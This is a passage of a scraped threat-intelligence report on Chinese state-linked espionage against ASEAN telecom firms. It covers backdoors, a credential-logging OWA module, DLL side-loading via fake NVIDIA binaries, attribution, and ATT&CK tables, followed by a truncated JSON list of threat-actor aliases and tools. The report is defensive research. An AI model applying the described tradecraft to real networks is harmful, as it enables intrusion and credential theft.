commands via CMD Shell\r\nSimilarities with Iron Tiger OWA Backdoors\r\nThe “Microsoft.Exchange.Clients.Event.dll” backdoor discussed in this section exhibits both code and functional\r\nsimilarities to a module named “Microsoft.Exchange.Clients.Auth.dll” that is described in a presentation by Steven Adair\r\nand a paper by TrendMicro about operation “Iron Tiger”, which describe sophisticated custom .NET backdoors dubbed\r\n“Dllshellexc2007” and “Dllshellexc2010”:\r\nExample of similar code shared between the two modules\r\nIn addition, the credentials log file created by both modules is very similar in its structure and collected data:\r\nIron Tiger Backdoor - decoded log file of “Microsoft.Exchange.Clients.Auth.dll” (“Dllshellexc2007” and\r\n“Dllshellexc2010” backdoors):\r\n239073 3/2/2015 10:22:09 AM x.x.x.x \u003caccount name\u003e \u003cpassword\u003e Mozilla/5.0 (Windows NT 6.1; WOW64)\r\nAppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36\r\nCluster C OWA Backdoor - decoded log file of “Microsoft.Exchange.Clients.Event.dll”:\r\n1/1/2021 5:32:22 PM x.x.x.x \u003caccount name\u003e \u003cpassword\u003e Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\nAppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66\r\nFurther Connections to Chinese Threat Actors\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 19 of 26\n\nDuring our analysis of the different clusters, we noticed interesting connections and similarities to known Chinese threat\r\nactors. In the interest of providing perhaps a broader context, we decided to share our observations in the hope that it will\r\nenable other researchers to draw their own conclusions as to the degree of relevance of our findings. \r\nConnections to Winnti’s Tools and Infrastructure\r\nConnections Between Naikon APT Nebulae Backdoor and Winnti’s ShadowPad Infrastructure\r\nWhen examining a Nebulae backdoor sample (likely not related to the attack), we noticed that one of the domains that were\r\ncontacted by backdoor is ttareyice.jkub[.]com. This domain was previously mentioned in a detailed report which talks about\r\nthe activity of the Winnti group, and also about its relations to other threat groups. It is also worth mentioning that Winnti is\r\nknown to attack telecommunications companies. According to the report, we can see an additional evidence of Winnti\r\nsharing its infrastructure, this time between a ShadowPad sample attributed to them and the Nebulae backdoor, reportedly\r\nattributed to Naikon:\r\nNebulae and ShadowPad mutual infrastructure\r\nUse of PcShare Backdoor in Previous Winnti-Related Attacks\r\nAnother possible connection to Winnti’s Shadowpad backdoor is via the usage of a customized PcShare Backdoor that was\r\nfound on multiple endpoints in Cluster A described in this report. In October 2020, Dr. Web released a report detailing\r\ntargeted attacks in Kazakhstan and Kyrgyzstan involving Winnti’s Shadowpad backdoor. That same report also mentions a\r\nbackdoor dubbed “BackDoor.Farfli.125'' that was deployed alongside the Shadowpad payloads. Our analysis of the\r\n“BackDoor.Farfli.125'' backdoor concluded that it is a variant of the open-source PcShare backdoor. \r\nFrom a tradecraft perspective, it is interesting to note that the attackers in the aforementioned Dr. Web report also chose to\r\nuse a loader that masquerades as a legitimate NVIDIA product, as shown in Cluster A of our report. \r\nPossible Connection Between APT41 and Soft Cell\r\nWhile pivoting from indicative PDB paths of the tools used by Soft Cell (listed in Appendix A, some were also observed by\r\nMarkus Neis), we came across additional binaries that share code similarities with another malware named ChipShot,\r\nattributed to APT41 (tracked by some vendors as Winnti). ChipShot is a .NET binary that drops a modified China Chopper\r\nWebShell, which is found in the resource section of the file. \r\nExamples of the pivoted PDB paths: \r\nE:\\vs_proj\\DeployFilter_NET2.0\\DeployFilter\\obj\\Release\\DeployFilter.pdb - ChipShot Dropper \r\nE:\\vs_proj\\serviceFilter_NET2.0\\serviceFilter\\obj\\Release\\serviceFilter.pdb - Modified ChinaChopper webshell\r\nIt is noteworthy to mention that APT41 was also reported targeting telecommunications organizations in the past, and was\r\nsuggested to be linked to the previous Soft Cell campaign from 2019. Also, the group was reported abusing a NVIDIA\r\nproduct (nvSmartEx.exe) for DLL side-loading, the same product that was abused in cluster A:\r\nCode snippet from ChipShot Dropper: edits the IIS applicationHost.config file\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 20 of 26\n\nCode snippet from Modified ChinaChopper WebShell\r\nPossible Connection Between Tropic Trooper and Soft Cell\r\nAs previously mentioned in our report, one of the PcShare payloads analyzed had the same hash that was mentioned in a\r\nreport by BlackBerry from 2019. In both instances, the attackers used the exact same DLL search order hijacking technique\r\nwith a fake NVIDIA product. \r\nAside from the forensic evidence, the geographical locations of the attacks and the timeline also point to a strong tie\r\nbetween the BlackBerry report and this report. BlackBerry hypothesized the threat actor behind the attack was Tropic\r\nTrooper, however, as mentioned in their report, they could not establish that attribution with high-certainty. \r\nAt this point, we can conclude that both intrusions were carried out by the same threat actor that had access to the same code\r\nand used an identical tradecraft. Whether Tropic Trooper and Soft Cell are the same actor remains unclear at the moment,\r\nsince we could not verify the BlackBerry attribution. \r\nPossible Connection Between Cluster B and an Older Phishing Attempt\r\nThe custom keylogger mentioned in Cluster B of this report was executed by a fake svchost.exe process located in a rather\r\nunusual folder: \r\nc:\\program files (x86)\\internet explorer\\svchost.exe (SHA-1: 91b0d7fa50d993c7a35ec501ef5f3585f0003a51). \r\nAside from the unusual location, the file also contained a few typos in its metadata fields (“Coporation”, “Widows”):\r\nTypos found in metadata fields of the fake svchost.exe\r\nPivoting on these specific typos, file name and version, we were able to find a sample in VirusTotal uploaded from Vietnam\r\nin October 2016 that is called “svchost.exe” and contains the same typos and file version. It’s interesting to notice that the\r\nsample name in-the-wild is called “1 Military Alliance Utilizing ASEAN Plus 3 as Platform An Appraisal for\r\nProspects.exe”: \r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 21 of 26\n\nUpon executing the sample, it will unpack the following into %TEMP% folder: \r\nA decoy PDF file\r\nAn unknown backdoor masquerading as a legitimate Windows binary wmiprvse.exe (SHA-1:\r\n5572fa29e61009a626320275b36eef0d5142e3e2) \r\nDecoy PDF file\r\nThe decoy PDF file contains questions and answers regarding a known geo-political territorial dispute in the South China\r\nSea, and particularly discusses the Chinese territorial dispute with the Philippines. \r\nWhile this could be merely a coincidence, the probability of having two samples with the exact same typos, file name and\r\nversion and both related to China, does seem a bit peculiar, especially since the Naikon APT group that we believe is behind\r\nCluster B is known to have attacked the countries of the South China Sea, including Vietnam and the Philippines, and\r\ntherefore we thought it might be worth mentioning. \r\nAttribution\r\nAttributing Clusters A, B and C\r\nAfter analyzing all of the data we accumulated through our platform, incident response efforts, malware analysis, and threat\r\nintelligence, we were able to define three distinct clusters of malicious activity. Each cluster is characterized with its own set\r\nof TTPs and infrastructure which appear to have operated independently, according to our analysis: \r\nCluster A: Attributed to the Soft Cell Activity Group \r\nBased on the evidence provided in this report as well as internal and publicly available information, Cybereason assesses\r\nwith high level of confidence that the intrusions detailed in this cluster are consistent with previous activities carried out by\r\nthe Soft Cell activity group. Soft Cell has yet been attributed to a specific threat actor, however, it is assessed that the group\r\noperates on behalf of Chinese state interests. As shown in our report, there are some interesting links between the Soft Cell\r\nactivity group and the APT41/Winnti threat actor, nevertheless, at the time of writing this report, there is not enough\r\nevidence to tie the two with sufficient certainty. \r\nCluster B: Suspected to be the Naikon APT Group\r\nBased on the information provided in this report as well as information that is publicly available regarding the Naikon APT\r\nthreat actor activity, Cybereason assesses with moderate confidence that the intrusions detailed in this cluster were carried\r\nout by the Naikon APT group. \r\nCluster C: Potentially Related to Group-3390 (also tracked as Emissary Panda, APT27)\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 22 of 26\n\nBased on the information provided in this report, Cybereason assesses with low-to-moderate confidence that the intrusions\r\ndetailed in this cluster were carried out by a threat actor who had access to the code of the “Dllshellexc2007” and\r\n“Dllshellexc2010” backdoors detailed in operation “Iron Tiger” and attributed by TrendMicro to Group-3390. \r\nThat being said, we cannot ignore certain interesting overlaps when it comes to the aforementioned clusters. In one\r\nparticular instance, Cybereason observed all three clusters on the same environment, and in some cases even operating on\r\nthe same endpoints around similar time frames. Whether this is merely a coincidence, or the clusters are somehow inter-connected, is not entirely clear at this point in time.\r\nAmong the three clusters, we lean towards the possibility that Cluster A and C might be connected based on the fact that\r\nthey have been operating in the same environment for over three years (since 2017/2018), while Cluster B only emerged in\r\n2020 Q4. In addition, the OWA backdoor described in Cluster C was previously proven to interact with the China Chopper\r\nWebShell that was used extensively in Cluster A. \r\nBased on our understanding and past experience with Chinese threat actors, there are several hypotheses that might explain\r\nthose overlaps:\r\nOne hypothesis is that the clusters represent the work of two or more teams with different sets of expertise (e.g\r\ninitial access team, foothold, telco-technology specialized team, etc.) all working together and reporting to the same\r\nChinese threat actor. \r\nA second hypothesis is that there are two or more Chinese threat actors with different agendas / tasks that are\r\naware of each other’s work and potentially even working in tandem. \r\nAnother plausible hypothesis is that the clusters are not interconnected and that the threat actors are working\r\nindependently with no collaboration, or even piggybacking on the access achieved by one of the actors involved. \r\nOne thing that remains consistent and evident in all three clusters is that they all point to threat actors that are believed to be\r\noperating on behalf of Chinese state interests. It is also not surprising that the Telcos targeted in these intrusions are located\r\nin ASEAN countries, some of which have long term publicly known disputes with the PRC (People’s Republic of China). \r\nA Note on CTI Attribution\r\nIn the world of threat intelligence, attribution is often not an exact science and should be continuously re-assessed overtime\r\nas new information emerges that can shed more light on the identity of the threat actors. Therefore, we encourage our\r\nreaders to use the information provided in this report and draw their own conclusions. In our attribution, inspired by the\r\nfamous Diamond Model, we have taken into account the following aspects of the intrusions: Victimology (location,\r\nindustry), Capabilities (mainly tools, techniques and procedures) and Infrastructure. \r\nWhen analyzing intrusions that happened over years, it is often difficult to separate one kill-chain from another even when\r\nthere is just a single threat actor. With the possibility of more than one threat actor operating in the same environment, this\r\ntask can be even more daunting, and oftentimes it can be tempting to treat everything as part of one larger attack originating\r\nfrom the same threat actor, which could lead to misattribution. We encourage other analysts to work with a well-defined\r\nattribution model that can make the fickle task of attribution less prone to mistakes and biases. \r\nConclusion\r\nIn this blog we uncovered three clusters of intrusions targeting Telcos in ASEAN countries that were active for several years,\r\nwith one cluster going back as far as 2017. We assess that the goal behind the intrusions was to facilitate cyber espionage\r\nefforts by gaining access to cellular providers for the purpose of exfiltrating sensitive data about the targeted companies and\r\ntheir customers. \r\nEach cluster appears to have its own unique characteristics, distinguishing it from the other clusters detailed in this report. In\r\nour report, we also mention the interesting overlaps observed among those clusters - namely the targeting of the same\r\nvictims, operating around similar time frames, and in some cases the existence of all three clusters on the same endpoints. \r\nAccording to our analysis, Cluster A was executed by the Soft Cell activity group, a group that is known to have attacked\r\nTelcos in the past in multiple regions and believed to be operating on behalf of Chinese state interests. The intrusions in this\r\ncluster span over three years, going back to 2018. The attackers behind it have shown great resourcefulness and adaptiveness\r\nin light of mitigation efforts, finding their way back in repeatedly, which may demonstrate how important it was for them to\r\nobtain the data from the targeted Telcos. \r\nCluster B was discovered in late 2020 and exhibited a different set of tools and techniques, including the rare Nebulae\r\nbackdoor and the previously undocumented EnrollLogger keylogger. We suspect that the activity in this cluster was carried\r\nout by the Naikon APT group, a very active cyber espionage group previously attributed to the Chinese People’s Liberation\r\nArmy’s (PLA). \r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 23 of 26\n\nCluster C is the oldest among the clusters, with first signs of intrusions going back to 2017. This cluster exhibited a rare\r\nOWA backdoor that shows considerable code and functionality similarities to previously documented backdoors that were\r\nused by the Group-3390 (APT27), an infamous cyber espionage APT group operating on behalf of Chinese state interests. \r\nWhether these clusters are in fact inter-connected or operated independently from each other is not entirely clear at the time\r\nof writing this report. We offered several hypotheses that can account for these overlaps, hoping that as time goes by more\r\ninformation will be made available to us and to other researchers that will help to shed light on this conundrum. \r\nResearchers\r\nLIOR ROCHBERGER, SENIOR THREAT RESEARCHER\r\nAs part of the Nocturnus team at Cybereason, Lior has created procedures to lead threat hunting, reverse engineering and\r\nmalware analysis teams. Lior has also been a contributing researcher to multiple threat and malware blogs including\r\nBitbucket, Valak, Ramnit, and Racoon stealer. Prior to Cybereason, Lior led SOC operations within the Israeli Air Force.\r\nTOM FAKTERMAN, THREAT RESEARCHER\r\nTom Fakterman, Cyber Security Analyst with the Cybereason Nocturnus Research Team, specializes in protecting critical\r\nnetworks and incident response. Tom has experience in researching malware, computer forensics and developing scripts and\r\ntools for automated cyber investigations.\r\nDANIEL FRANK, SENIOR MALWARE RESEARCHER\r\nWith a decade in malware research, Daniel uses his expertise with malware analysis and reverse engineering to understand\r\nAPT activity and commodity cybercrime attackers. Daniel has previously shared research at RSA Conference, the Microsoft\r\nDigital Crimes Consortium, and Rootcon.\r\nASSAF DAHAN, HEAD OF THREAT RESEARCH\r\nAssaf has over 15 years in the InfoSec industry. He started his career in the Israeli Military 8200 Cybersecurity unit where\r\nhe developed extensive experience in offensive security. Later in his career he led Red Teams, developed penetration testing\r\nmethodologies, and specialized in malware analysis and reverse engineering.\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 24 of 26\n\nIndicators of Compromise\r\nOpen the chatbot on the bottom right corner of this report to access the DeadRinger IOCs and Appendix A.\r\nMITRE ATT\u0026CK BREAKDOWN (Cluster A - Soft Cell Activity)\r\nReconnaissance\r\nInitial\r\nAccess\r\nExecution Persistence\r\nPrivilege\r\nEscalation\r\nDefense\r\nEvasion\r\nLateral\r\nMovement\r\nCredential\r\nAccess\r\nDiscovery\r\nGather Victim\r\nHost\r\nInformation\r\nExploit\r\nPublic-Facing\r\nApplication\r\nCommand-line\r\ninterface\r\nWebShell\r\nValid\r\nAccounts\r\nHijack\r\nExecution\r\nFlow\r\nWindows\r\nAdmin\r\nShares\r\nCredential\r\nDumping\r\nSystem\r\nNetwork\r\nConfiguratio\r\nDiscovery\r\nActive Scanning  \r\nWindows\r\nManagement\r\nInstrumentation\r\nCreate\r\nAccount\r\nWebShell\r\nIndicator\r\nRemoval\r\nfrom Tools\r\nPass the\r\nHash\r\nCredentials\r\nfrom\r\nPassword\r\nStores\r\nRemote\r\nSystem\r\nDiscovery\r\nGather Victim\r\nNetwork\r\nInformation\r\n  PowerShell\r\nScheduled\r\nTask\r\n \r\nObfuscated\r\nFiles or\r\nInformation\r\nRemote\r\nFile Copy\r\n \r\nAccount\r\nDiscovery\r\n          Masquerading    \r\nPermission\r\nGroups\r\nDiscovery\r\n         \r\nIndicator\r\nRemoval on\r\nHost:\r\nTimestomp\r\n     \r\nMITRE ATT\u0026CK BREAKDOWN (Cluster B - Suspected Naikon APT Activity)\r\nReconnaissance Execution Persistence\r\nPrivilege\r\nEscalation\r\nDefense\r\nEvasion\r\nLateral\r\nMovement\r\nCredential\r\nAccess\r\nDiscovery\r\nComm\r\nand\r\nContr\r\nGather Victim\r\nHost\r\nInformation\r\nCommand-line\r\ninterface\r\nWindows\r\nService\r\nValid\r\nAccounts\r\nDLL-side\r\nLoading\r\nSMB/Windows\r\nAdmin Shares\r\nKeylogging\r\nSystem\r\nNetwork\r\nConfiguration\r\nDiscovery\r\nEncry\r\nChann\r\nActive Scanning\r\nWindows\r\nManagement\r\nInstrumentation\r\n   \r\nIndicator\r\nRemoval\r\nfrom Tools\r\nLateral Tool\r\nTransfer\r\nCredential\r\nDumping\r\nRemote\r\nSystem\r\nDiscovery\r\n \r\nGather Victim\r\nNetwork\r\nInformation\r\nSystem\r\nServices\r\n    Masquerading    \r\nAccount\r\nDiscovery\r\n \r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 25 of 26\n\nPermission\r\nGroups\r\nDiscovery\r\n \r\nMITRE ATT\u0026CK BREAKDOWN (Cluster C - Custom OWA Backdoor)\r\nExecution Persistence Defense Evasion\r\nCredential\r\nAccess\r\nDiscovery\r\nCommand\r\nand\r\nControl\r\nExfiltration\r\nCommand-line\r\ninterface\r\nWeb Shell Masquerading\r\nNetwork\r\nSniffing\r\nAccount\r\nDiscovery\r\nWeb\r\nProtocols\r\nExfiltration\r\nOver C2\r\nChannel\r\n   \r\nDeobfuscate/Decode\r\nFiles or Information\r\n \r\nRemote\r\nSystem\r\nDiscovery\r\n   \r\nAbout the Author\r\nCybereason Nocturnus\r\n \r\nThe Cybereason Nocturnus Team has brought the world’s brightest minds from the military, government intelligence, and\r\nenterprise security to uncover emerging threats across the globe. They specialize in analyzing new attack methodologies,\r\nreverse-engineering malware, and exposing unknown system vulnerabilities. The Cybereason Nocturnus Team was the first\r\nto release a vaccination for the 2017 NotPetya and Bad Rabbit cyberattacks.\r\nAll Posts by Cybereason Nocturnus\r\nSource: https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 26 of 26\n\nPhase 4: Changes The only addition in TTPs observed between phase four compared to previous phases is that the attackers once again used a different\nMimikatz executable named d64.exe. It was found in both folders: c:\\windows\\d64.exe and c:\\compaq\\d64.exe:\n Page 11 of 26", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos" ], "report_names": [ "deadringer-exposing-chinese-threat-actors-targeting-major-telcos" ], "threat_actors": [ { "id": "81d49904-579d-45b3-ace2-1fdf0a713bc4", "created_at": "2022-10-25T15:50:23.331457Z", "updated_at": "2026-04-10T02:00:05.291098Z", "deleted_at": null, "main_name": "Leafminer", "aliases": [ "Leafminer", "Raspite" ], "source_name": "MITRE:Leafminer", "tools": [ "LaZagne", "Mimikatz", "MailSniper", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "7c969685-459b-4c93-a788-74108eab6f47", "created_at": "2023-01-06T13:46:39.189751Z", "updated_at": "2026-04-10T02:00:03.241102Z", "deleted_at": null, "main_name": "HAFNIUM", "aliases": [ "Red Dev 13", "Silk Typhoon", "MURKY PANDA", "ATK233", "G0125", "Operation Exchange Marauder" ], "source_name": "MISPGALAXY:HAFNIUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "552eeef7-4a19-44de-9147-db8893c115ef", "created_at": "2023-01-06T13:46:38.598788Z", "updated_at": "2026-04-10T02:00:03.034846Z", "deleted_at": null, "main_name": "RASPITE", "aliases": [ "LeafMiner", "Raspite" ], "source_name": "MISPGALAXY:RASPITE", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5bbced13-72f7-40dc-8c41-dcce75bf885e", "created_at": "2022-10-25T15:50:23.695735Z", "updated_at": "2026-04-10T02:00:05.335976Z", "deleted_at": null, "main_name": "Winnti Group", "aliases": [ "Winnti Group" ], "source_name": "MITRE:Winnti Group", "tools": [ "PipeMon", "Winnti for Windows", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "13354d3f-3f40-44ec-b42a-3cda18809005", "created_at": "2022-10-25T15:50:23.275272Z", "updated_at": "2026-04-10T02:00:05.36519Z", "deleted_at": null, "main_name": "APT3", "aliases": [ "APT3", "Gothic Panda", "Pirpi", "UPS Team", "Buckeye", "Threat Group-0110", "TG-0110" ], "source_name": "MITRE:APT3", "tools": [ "OSInfo", "schtasks", "PlugX", "LaZagne", "SHOTPUT", "RemoteCMD" ], "source_id": "MITRE", "reports": null }, { "id": "761d1fb2-60e3-46f0-9f1c-c8a9715967d4", "created_at": "2023-01-06T13:46:38.269054Z", "updated_at": "2026-04-10T02:00:02.90356Z", "deleted_at": null, "main_name": "APT3", "aliases": [ "GOTHIC PANDA", "TG-0110", "Buckeye", "Group 6", "Boyusec", "BORON", "BRONZE MAYFAIR", "Red Sylvan", "Brocade Typhoon" ], "source_name": "MISPGALAXY:APT3", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2704d770-43b4-4bc4-8a5a-05df87416848", "created_at": "2022-10-25T15:50:23.306305Z", "updated_at": "2026-04-10T02:00:05.296581Z", "deleted_at": null, "main_name": "HAFNIUM", "aliases": [ "HAFNIUM", "Operation Exchange Marauder", "Silk Typhoon" ], "source_name": "MITRE:HAFNIUM", "tools": [ "Tarrask", "ASPXSpy", "Impacket", "PsExec", "China Chopper" ], "source_id": "MITRE", "reports": null }, { "id": "b69484be-98d1-49e6-aed1-a28dbf65176a", "created_at": "2022-10-25T16:07:23.886782Z", "updated_at": "2026-04-10T02:00:04.779029Z", "deleted_at": null, "main_name": "Naikon", "aliases": [ "G0019", "Hellsing", "ITG06", "Lotus Panda", "Naikon", "Operation CameraShy" ], "source_name": "ETDA:Naikon", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "AR", "ARL", "Agent.dhwf", "Aria-body", "Aria-body loader", "Asset Reconnaissance Lighthouse", "BackBend", "Creamsicle", "Custom HDoor", "Destroy RAT", "DestroyRAT", "Flashflood", "FoundCore", "Gemcutter", "HDoor", "JadeRAT", "Kaba", "Korplug", "LOLBAS", "LOLBins", "LadonGo", "Lecna", "Living off the Land", "NBTscan", "Naikon", "NetEagle", "Neteagle_Scout", "NewCore RAT", "Orangeade", "PlugX", "Quarks PwDump", "RARSTONE", "RainyDay", "RedDelta", "RoyalRoad", "Sacto", "Sandboxie", "ScoutEagle", "Shipshape", "Sisfader", "Sisfader RAT", "Sogu", "SslMM", "Sys10", "TIGERPLUG", "TVT", "TeamViewer", "Thoper", "WinMM", "Xamtrav", "XsFunction", "ZRLnk", "nbtscan", "nokian", "norton", "xsControl", "xsPlus" ], "source_id": "ETDA", "reports": null }, { "id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c", "created_at": "2022-10-25T15:50:23.819113Z", "updated_at": "2026-04-10T02:00:05.354598Z", "deleted_at": null, "main_name": "Threat Group-3390", "aliases": [ "Threat Group-3390", "Earth Smilodon", "TG-3390", "Emissary Panda", "BRONZE UNION", "APT27", "Iron Tiger", "LuckyMouse", "Linen Typhoon" ], "source_name": "MITRE:Threat Group-3390", "tools": [ "Systeminfo", "gsecdump", "PlugX", "ASPXSpy", "Cobalt Strike", "Mimikatz", "Impacket", "gh0st RAT", "certutil", "China Chopper", "HTTPBrowser", "Tasklist", "netstat", "SysUpdate", "HyperBro", "ZxShell", "RCSession", "ipconfig", "Clambling", "pwdump", "NBTscan", "Pandora", "Windows Credential Editor" ], "source_id": "MITRE", "reports": null }, { "id": "a2912fc0-c34e-4e4b-82e9-665416c8fe32", "created_at": "2023-04-20T02:01:50.979595Z", "updated_at": "2026-04-10T02:00:02.913011Z", "deleted_at": null, "main_name": "Naikon", "aliases": [ "BRONZE STERLING", "G0013", "PLA Unit 78020", "OVERRIDE PANDA", "Camerashy", "BRONZE GENEVA", "G0019", "Naikon" ], "source_name": "MISPGALAXY:Naikon", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "61ea51ed-a419-4b05-9241-5ab0dbba25fc", "created_at": "2023-01-06T13:46:38.354607Z", "updated_at": "2026-04-10T02:00:02.939761Z", "deleted_at": null, "main_name": "APT23", "aliases": [ "BRONZE HOBART", "G0081", "Red Orthrus", "Earth Centaur", "PIRATE PANDA", "KeyBoy", "Tropic Trooper" ], "source_name": "MISPGALAXY:APT23", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bef7800a-a08f-4e21-b65c-4279c851e572", "created_at": "2022-10-25T15:50:23.409336Z", "updated_at": "2026-04-10T02:00:05.319608Z", "deleted_at": null, "main_name": "Tropic Trooper", "aliases": [ "Tropic Trooper", "Pirate Panda", "KeyBoy" ], "source_name": "MITRE:Tropic Trooper", "tools": [ "USBferry", "ShadowPad", "PoisonIvy", "BITSAdmin", "YAHOYAH", "KeyBoy" ], "source_id": "MITRE", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "945a572f-ebe3-4e2f-a288-512fe751cfa8", "created_at": "2022-10-25T16:07:24.413971Z", "updated_at": "2026-04-10T02:00:04.97924Z", "deleted_at": null, "main_name": "Winnti Group", "aliases": [ "G0044", "Leopard Typhoon", "Wicked Panda", "Winnti Group" ], "source_name": "ETDA:Winnti Group", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "FunnySwitch", "RbDoor", "RibDoor", "RouterGod", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "9f1ce7e3-77cd-4af0-bedb-1643f55c9baf", "created_at": "2022-10-25T15:50:23.31611Z", "updated_at": "2026-04-10T02:00:05.370146Z", "deleted_at": null, "main_name": "Naikon", "aliases": [ "Naikon" ], "source_name": "MITRE:Naikon", "tools": [ "ftp", "netsh", "WinMM", "Systeminfo", "RainyDay", "RARSTONE", "HDoor", "Sys10", "SslMM", "PsExec", "Tasklist", "Aria-body" ], "source_id": "MITRE", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "cf826655-5fcb-4331-bdc5-5ef267db9d3c", "created_at": "2025-08-07T02:03:24.631402Z", "updated_at": "2026-04-10T02:00:03.608938Z", "deleted_at": null, "main_name": "BRONZE MAYFAIR", "aliases": [ "APT3 ", "Gothic Panda ", "Pirpi", "TG-0110 ", "UPSTeam" ], "source_name": "Secureworks:BRONZE MAYFAIR", "tools": [ "Cookiecutter", "HUC Proxy Malware (Htran)", "Pirpi", "PlugX", "SplitVPN", "UPS", "ctt", "ctx" ], "source_id": "Secureworks", "reports": null }, { "id": "04b07437-41bb-4126-bcbb-def16f19d7c6", "created_at": "2022-10-25T16:07:24.232628Z", "updated_at": "2026-04-10T02:00:04.906097Z", "deleted_at": null, "main_name": "Stone Panda", "aliases": [ "APT 10", "ATK 41", "Bronze Riverside", "CTG-5938", "CVNX", "Cuckoo Spear", "Earth Kasha", "G0045", "G0093", "Granite Taurus", "Happyyongzi", "Hogfish", "ITG01", "Operation A41APT", "Operation Cache Panda", "Operation ChessMaster", "Operation Cloud Hopper", "Operation Cuckoo Spear", "Operation New Battle", "Operation Soft Cell", "Operation TradeSecret", "Potassium", "Purple Typhoon", "Red Apollo", "Stone Panda", "TA429", "menuPass", "menuPass Team" ], "source_name": "ETDA:Stone Panda", "tools": [ "Agent.dhwf", "Agentemis", "Anel", "AngryRebel", "BKDR_EVILOGE", "BKDR_HGDER", "BKDR_NVICM", "BUGJUICE", "CHINACHOPPER", "ChChes", "China Chopper", "Chymine", "CinaRAT", "Cobalt Strike", "CobaltStrike", "DARKTOWN", "DESLoader", "DILLJUICE", "DILLWEED", "Darkmoon", "DelfsCake", "Derusbi", "Destroy RAT", "DestroyRAT", "Ecipekac", "Emdivi", "EvilGrab", "EvilGrab RAT", "FYAnti", "Farfli", "Gen:Trojan.Heur.PT", "Gh0st RAT", "Ghost RAT", "GreetCake", "HAYMAKER", "HEAVYHAND", "HEAVYPOT", "HTran", "HUC Packet Transmit Tool", "Ham Backdoor", "HiddenFace", "Impacket", "Invoke the Hash", "KABOB", "Kaba", "Korplug", "LODEINFO", "LOLBAS", "LOLBins", "Living off the Land", "MiS-Type", "Mimikatz", "Moudour", "Mydoor", "NBTscan", "NOOPDOOR", "Newsripper", "P8RAT", "PCRat", "PlugX", "Poison Ivy", "Poldat", "PowerSploit", "PowerView", "PsExec", "PsList", "Quarks PwDump", "Quasar RAT", "QuasarRAT", "RedDelta", "RedLeaves", "Rubeus", "SNUGRIDE", "SPIVY", "SharpSploit", "SigLoader", "SinoChopper", "SodaMaster", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Trochilus RAT", "UpperCut", "Vidgrab", "WinRAR", "WmiExec", "Wmonder", "Xamtrav", "Yggdrasil", "Zlib", "certutil", "certutil.exe", "cobeacon", "dfls", "lena", "nbtscan", "pivy", "poisonivy", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": 